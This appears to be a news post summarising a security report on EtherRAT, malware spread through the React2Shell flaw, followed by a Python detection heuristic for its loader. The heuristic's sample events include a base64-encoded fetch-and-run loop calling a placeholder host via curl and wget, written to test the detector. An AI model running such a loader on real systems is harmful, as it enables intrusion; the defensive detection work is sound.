
"A new malware implant called EtherRAT, deployed in a recent React2Shell attack, runs five separate Linux persistence mechanisms and leverages Ethereum smart contracts for communication with the attacker. Researchers at cloud security company Sysdig believe that the malware aligns with North Korea's tools used in Contagious Interview campaigns. They recovered EtherRAT from a compromised Next.js application just two days after the disclosure of the critical React2Shell vulnerability tracked as CVE-2025-55182."
"Sysdig highlights EtherRAT's mix of sophisticated features, including blockchain-based command-and-control (C2) communication, multi-layered Linux persistence, on-the-fly payload rewriting, and evasion using a full Node.js runtime. Although there are substantial overlaps with "Contagious Interview" operations conducted by Lazarus, EtherRAT is different in several key aspects. React2Shell is a max-severity deserialization flaw in the React Server Components (RSC) "Flight" protocol that allows unauthenticated remote code execution via a crafted HTTP request."
"EtherRAT uses a multi-stage attack chain, starting with the exploitation of React2Shell to execute a base64-encoded shell command on the target, Sysdig says. The command attempts to download a malicious shell script (s.sh) with curl, wget, or python3 as fallbacks, and loops every 300 seconds until successful. When the script is fetched, it is checked, turned into an executable, and launched."
EtherRAT is a new malware implant that runs five separate Linux persistence mechanisms and leverages Ethereum smart contracts for attacker communication. EtherRAT was recovered from a compromised Next.js application two days after disclosure of React2Shell (CVE-2025-55182). The malware includes blockchain-based C2, multi-layered Linux persistence, on-the-fly payload rewriting, and evasion using a full Node.js runtime. EtherRAT shows overlaps with Contagious Interview operations linked to Lazarus but differs in key aspects. React2Shell is a critical deserialization flaw in the React Server Components Flight protocol that enables unauthenticated remote code execution. Exploitation began within hours of disclosure, with automated attacks following and breaches reported across multiple sectors.
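The stage-one loader described above (a base64-encoded shell command that fetches s.sh with curl, wget or python3 as fallbacks and retries every 300 seconds) has a recognizable shape that defenders can hunt for in process-execution telemetry. The following detection heuristic is an added example, not code from the article, Sysdig or BleepingComputer; the event format, the `c2.example.invalid` host and the sample events are constructed assumptions.

```python
import base64
import re

# Constructed process-exec events (not from the article), shaped like
# "pid=<n> cmdline=<args>" records from an auditd/EDR pipeline. The decoded
# stage one mirrors the article's description; host and paths are placeholders.
_LOADER_SHAPE = ("while true; do curl -fsSL http://c2.example.invalid/s.sh -o /tmp/s.sh || "
                 "wget -q http://c2.example.invalid/s.sh -O /tmp/s.sh || python3 -c 'pass'; sleep 300; done")
SAMPLE_EVENTS = [
    "pid=4101 cmdline=sh -c echo %s | base64 -d | sh"
    % base64.b64encode(_LOADER_SHAPE.encode()).decode(),
    "pid=4102 cmdline=node /app/server.js",
    "pid=4103 cmdline=sh -c echo %s | base64 -d"  # benign encoded job, must not alert
    % base64.b64encode(b"nightly backup of /var/lib/app finished cleanly").decode(),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
DOWNLOADERS = ("curl", "wget", "python3")

def decode_embedded_base64(cmdline):
    """Decode every long base64-looking token found in a command line."""
    out = []
    for tok in B64_TOKEN.findall(cmdline):
        try:
            out.append(base64.b64decode(tok, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: token is not real base64
            continue
    return out

def score_loader(decoded):
    """Traits of the stage-one loader: retry loop, long sleep, chained downloaders, .sh fetch."""
    hits = []
    if re.search(r"\b(while|until)\b.*\bdone\b", decoded, re.S):
        hits.append("retry_loop")
    m = re.search(r"\bsleep\s+(\d+)", decoded)
    if m and int(m.group(1)) >= 60:
        hits.append("long_sleep")
    tools = [t for t in DOWNLOADERS if re.search(r"\b%s\b" % t, decoded)]
    if len(tools) >= 2 and "||" in decoded:  # two or more download tools as fallbacks
        hits.append("download_fallbacks")
    if re.search(r"\.sh\b", decoded):
        hits.append("fetches_shell_script")
    return hits

def scan_events(events, threshold=3):
    """Return (pid, hits) for events whose decoded payload shows >= threshold traits."""
    findings = []
    for ev in events:
        pid = re.search(r"pid=(\d+)", ev).group(1)
        for hits in map(score_loader, decode_embedded_base64(ev)):
            if len(hits) >= threshold:
                findings.append((pid, hits))
    return findings
```

The threshold keeps an ordinary encoded cron job from alerting; lowering it trades precision for recall when the loader shape changes between campaigns.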
Read at BleepingComputer